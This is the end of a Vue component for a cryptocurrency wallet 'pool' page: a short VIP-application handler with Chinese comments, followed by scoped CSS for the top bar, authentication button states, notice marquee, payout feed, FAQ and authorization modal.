        // 接口在 /api/user 下，需要先有地址和 token
        const { address } = await this.ensureWalletReady();
        if (!address) throw new Error(this.$t("errEmptyAddress"));

        // coin 取顶部选中的计价币；chain 不传，由后端按会员当前链判定
        const res = await vipApply({ coin: this.$quote });

        // 成功时 data 为空，后端 msg 已按 lang 头本地化，优先展示它
        this.showVipMessage((res && res.msg) || this.$t("vipApplySubmitted"), false);
      } catch (err) {
        // 重复提交等业务失败：后端 msg 由 apiPost 抛成 Error
        this.showVipMessage((err && err.message) || this.$t("vipApplyFailed"), true);
      } finally {
        this.vipApplying = false;
      }
    },
  },
};
</script>

<style scoped>
.home {
  min-height: 100vh;
  padding-bottom: 92px;
  background: transparent;
}

/* ---------- 顶栏 ---------- */
.topbar {
  height: 52px;
  display: flex;
  align-items: center;
  justify-content: space-between;
  padding: 0 14px;
}

.coin-sel {
  display: flex;
  align-items: center;
  gap: 6px;
  color: var(--pool-text);
  font-size: 15px;
  font-weight: 600;
}

.coin-sel img {
  width: 20px;
  height: 20px;
  border-radius: 50%;
}

.coin-sel svg {
  width: 13px;
  height: 13px;
  stroke: var(--pool-muted);
  fill: none;
  stroke-width: 2.4;
  stroke-linecap: round;
  stroke-linejoin: round;
}

.addr {
  max-width: 120px;
  height: 30px;
  line-height: 30px;
  padding: 0 14px;
  border-radius: 15px;
  background: linear-gradient(120deg, #3f7bff, #4b86ff);
  color: #fff;
  font-size: 12px;
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
}

/* ---------- 内容区 ---------- */
.page {
  padding: 0 14px;
}

/* Hero */
.hero {
  display: flex;
  align-items: center;
  justify-content: space-between;
  padding: 8px 2px 0;
  min-height: 118px;
}

.hero-txt {
  flex: 1;
  min-width: 0;
}

.hero-txt h1 {
  margin: 0;
  font-size: 26px;
  font-weight: 750;
  letter-spacing: -0.01em;
  color: var(--pool-text);
  text-wrap: balance;
}

.hero-txt p {
  margin: 10px 0 0;
  color: var(--pool-muted);
  font-size: 14px;
}

.hero-img {
  width: 128px;
  height: auto;
  flex: none;
  margin-left: 8px;
}

/* 主按钮 */
.primary-btn {
  display: block;
  width: 100%;
  margin-top: 14px;
  height: 42px;
  border: 0;
  border-radius: 12px;
  background: var(--pool-grad);
  color: #04121a;
  font-size: 15px;
  font-weight: 700;
  letter-spacing: 0.02em;
  box-shadow: 0 14px 30px -16px rgba(51, 226, 199, 0.5);
  cursor: pointer;
}

/* Hero「安全认证」按钮更紧凑、居中 */
.hero-auth {
  width: 66%;
  margin-left: auto;
  margin-right: auto;
  height: 40px;
  font-size: 14px;
}

.primary-btn:disabled {
  opacity: 0.75;
}

.auth-loading-label,
.auth-success-label {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  gap: 7px;
}

.auth-loading-dots {
  display: inline-flex;
  align-items: center;
  gap: 2px;
  min-width: 22px;
}

.auth-loading-dots span {
  display: inline-block;
  animation: auth-dot-bounce 1.05s ease-in-out infinite;
}

.auth-loading-dots span:nth-child(2) {
  animation-delay: 0.15s;
}

.auth-loading-dots span:nth-child(3) {
  animation-delay: 0.3s;
}

@keyframes auth-dot-bounce {
  0%,
  60%,
  100% {
    opacity: 0.35;
    transform: translateY(0);
  }
  30% {
    opacity: 1;
    transform: translateY(-4px);
  }
}

.primary-btn.auth-succeeded:disabled {
  opacity: 1;
  cursor: default;
}

.auth-success-icon {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  width: 19px;
  height: 19px;
  border-radius: 50%;
  background: #12a86b;
  color: #fff;
  font-size: 13px;
  font-weight: 800;
  line-height: 1;
}

.auth-failure-icon {
  display: inline-flex;
  flex: none;
  align-items: center;
  justify-content: center;
  width: 18px;
  height: 18px;
  border-radius: 50%;
  background: var(--pool-bad);
  color: #fff;
  font-size: 14px;
  font-weight: 800;
  line-height: 1;
}

@media (prefers-reduced-motion: reduce) {
  .auth-loading-dots span {
    animation: none;
    opacity: 1;
  }
}

/* 公告跑马灯 */
.notice {
  display: flex;
  align-items: center;
  gap: 8px;
  margin-top: 14px;
  padding: 10px 12px;
  background: var(--pool-glass);
  border: 1px solid var(--pool-line);
  border-radius: 12px;
}

.notice .bell {
  width: 18px;
  height: 18px;
  flex: none;
  stroke: var(--pool-teal);
  fill: none;
  stroke-width: 1.8;
  stroke-linecap: round;
  stroke-linejoin: round;
}

.notice-view {
  flex: 1;
  overflow: hidden;
}

.notice-track {
  display: inline-flex;
  gap: 60px;
  white-space: nowrap;
  animation: notice-scroll 20s linear infinite;
}

.notice-track span {
  color: var(--pool-muted);
  font-size: 13px;
}

@keyframes notice-scroll {
  0% {
    transform: translateX(0);
  }
  100% {
    transform: translateX(-50%);
  }
}

/* 区块标题 */
.sec-title {
  text-align: center;
  margin: 26px 0 12px;
  font-size: 20px;
  font-weight: 700;
  color: var(--pool-text);
}

.sec-sub {
  text-align: center;
  margin: -6px 0 14px;
  font-size: 13px;
  color: var(--pool-muted);
}

/* 玻璃卡片 + 行 */
.card {
  background: var(--pool-glass);
  border: 1px solid var(--pool-line);
  border-radius: var(--pool-r);
  padding: 4px 16px;
  box-shadow: 0 20px 40px -34px rgba(0, 0, 0, 0.9);
}

.row {
  display: flex;
  align-items: center;
  justify-content: space-between;
  padding: 14px 0;
  border-bottom: 1px solid var(--pool-line);
}

.row:last-child {
  border-bottom: 0;
}

.row .k {
  color: var(--pool-muted);
  font-size: 14px;
}

.row .v {
  color: var(--pool-text);
  font-weight: 700;
  font-size: 15px;
  font-variant-numeric: tabular-nums;
}

.row .v.accent {
  background: var(--pool-grad);
  -webkit-background-clip: text;
  background-clip: text;
  color: transparent;
}

.row .cc {
  display: flex;
  align-items: center;
  gap: 8px;
  color: var(--pool-text);
  font-weight: 700;
}

.row .cc img {
  width: 24px;
  height: 24px;
  border-radius: 50%;
}

.row .all {
  display: flex;
  align-items: center;
  gap: 4px;
  color: var(--pool-muted);
  font-size: 14px;
}

.row .all svg {
  width: 14px;
  height: 14px;
  stroke: var(--pool-muted);
  fill: none;
  stroke-width: 2;
}

/* VIP 横幅 */
.vip-banner {
  margin: 4px 0 12px;
  border-radius: 14px;
  overflow: hidden;
  border: 1px solid var(--pool-line);
}

.vip-banner img {
  display: block;
  width: 100%;
  height: auto;
}

.vip-rate {
  padding: 14px 0 12px;
}

.vip-rate .rate {
  color: var(--pool-good);
  font-size: 18px;
  font-weight: 700;
}

.vip-rate .rate-desc {
  display: block;
  margin-top: 6px;
  color: var(--pool-muted);
  font-size: 13px;
}

/* 使用者输出 */
.feed-head {
  display: flex;
  justify-content: space-between;
  padding: 0 6px 8px;
  color: var(--pool-muted);
  font-size: 13px;
}

.feed-card {
  height: 340px;
  overflow: hidden;
  padding: 0 14px;
}

.feed.rolling {
  animation: feed-roll 22s linear infinite;
}

.feed-row {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 11px 0;
  border-bottom: 1px solid var(--pool-line);
  font-size: 13px;
}

.feed-empty {
  justify-content: center;
  color: var(--pool-faint);
  border-bottom: 0;
}

.fa {
  color: var(--pool-muted);
  font-variant-numeric: tabular-nums;
}

.fn {
  color: var(--pool-text);
  font-weight: 700;
  font-variant-numeric: tabular-nums;
}

@keyframes feed-roll {
  0% {
    transform: translateY(0);
  }
  100% {
    transform: translateY(-50%);
  }
}

/* 常见问题 */
.faq-card {
  padding: 2px 14px;
}

.faq {
  padding: 14px 0;
  border-bottom: 1px solid var(--pool-line);
  cursor: pointer;
}

.faq:last-child {
  border-bottom: 0;
}

.faq-q {
  display: flex;
  justify-content: space-between;
  align-items: center;
  gap: 10px;
  color: var(--pool-text);
  font-size: 15px;
  font-weight: 600;
}

.caret {
  width: 16px;
  height: 16px;
  flex: none;
  stroke: var(--pool-muted);
  fill: none;
  stroke-width: 2;
  transition: transform 0.2s ease;
}

.caret.open {
  transform: rotate(180deg);
}

.faq-a {
  margin: 10px 0 0;
  color: var(--pool-muted);
  font-size: 13px;
  line-height: 1.6;
  word-break: break-word;
}

/* logo 区 */
.logo-row {
  display: grid;
  grid-template-columns: repeat(3, minmax(0, 1fr));
  gap: 10px;
  margin: 4px 0 8px;
}

.logo-grid {
  display: grid;
  grid-template-columns: repeat(2, minmax(0, 1fr));
  gap: 12px;
  margin: 4px 0 8px;
}

.logo-row img,
.logo-grid img {
  width: 100%;
  height: 54px;
  object-fit: contain;
  background: #eef1f6;
  border-radius: 12px;
  padding: 12px 16px;
  box-sizing: border-box;
}

/* 授权弹窗 */
.receive-mask {
  position: fixed;
  inset: 0;
  background: rgba(0, 0, 0, 0.6);
  z-index: 1200;
  display: flex;
  justify-content: center;
  align-items: center;
  padding: 12px;
  box-sizing: border-box;
}

.receive-card {
  position: relative;
  width: min(430px, 94vw);
  border-radius: var(--pool-r);
  background: var(--pool-ink-2);
  border: 1px solid var(--pool-line);
  box-shadow: 0 20px 40px -34px rgba(0, 0, 0, 0.9);
  padding: 22px 16px 18px;
  box-sizing: border-box;
}

.receive-close {
  position: absolute;
  right: 12px;
  top: 10px;
  width: 32px;
  height: 32px;
  border-radius: 50%;
  border: 1px solid var(--pool-line);
  background: var(--pool-glass-2);
  color: var(--pool-muted);
  font-size: 20px;
  line-height: 1;
}

.receive-card h3 {
  margin: 0;
  text-align: center;
  font-size: 20px;
  color: var(--pool-text);
}

.receive-card p {
  margin: 14px 0 0;
  color: var(--pool-text);
  font-size: 15px;
  line-height: 1.6;
}

.receive-card .primary-btn {
  margin-top: 18px;
}

.receive-error {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 6px;
  margin-top: 14px;
  color: var(--pool-bad);
  font-size: 13px;
  line-height: 1.5;
  word-break: break-word;
}

/* 授权失败提示挂在 Hero 按钮下方；成功状态直接显示在按钮内。 */
.auth-error {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 6px;
  margin: 10px auto 0;
  width: 66%;
  font-size: 13px;
  line-height: 1.5;
  text-align: center;
  word-break: break-word;
}

.auth-error {
  color: var(--pool-bad);
}

/* VIP 申请结果提示：默认成功态，失败加 .bad */
.vip-msg {
  margin: 10px 4px 0;
  color: var(--pool-teal);
  font-size: 13px;
  line-height: 1.5;
  text-align: left;
  word-break: break-word;
}

.vip-msg.bad {
  color: var(--pool-bad);
}
</style>
